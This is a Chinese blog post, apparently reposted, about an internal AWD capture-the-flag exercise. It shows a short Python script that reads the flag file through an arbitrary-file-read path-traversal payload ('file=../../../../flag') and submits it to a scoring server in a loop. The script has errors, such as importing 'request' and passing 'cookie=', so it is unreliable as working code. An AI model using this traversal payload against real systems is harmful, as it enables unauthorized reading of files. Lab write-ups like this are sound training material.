记一次AWD自动获取flag并提交


背景

近期部门内搭建了攻防实验平台供大家练习,周末组织了一波AWD练习,之前都是做渗透测试比较多,加之题目比较简单,找到漏洞getshell拿flag都没问题,只不过如果没找到突破口flag都要手动提交的话,拿分会慢很多。
在过程中发现其实除了getshell后在服务器根目录/下读到flag,其实靶机网站中还存在一个任意文件读取漏洞,那这样写脚本自动flag就简单得多了。

自动提交flag的脚本

#! /usr/bin/env python
# coding: utf-8

import os
import time
import request

url = "http://10.233.*.*:800/admin/Database/downFile.html?type=sql&file=../../../../../../../flag"

while True:
	flag = request.get(url,cookie={'skin':'0','PHPSESSID':'18kdkfhsdkfh3323'}).text
	print flag
	url2 = 'http://10.233.*.*:801/flag_file.php?token=team3&flag=%s' %flag
	submit = request.get(url2).text
	print submit
	time.sleep(60*2)    #flag两分钟更新一次

后记

只是想记录一下,flag不一定需要getshell后才能拿到,所以写自动提交flag的脚本也可以是多样的


免责声明!

本站转载的文章为个人学习借鉴使用,本站对版权不负任何法律责任。如果侵犯了您的隐私权益,请联系本站邮箱yoyou2525@163.com删除。



 
粤ICP备18138465号  © 2018-2025 CODEPRJ.COM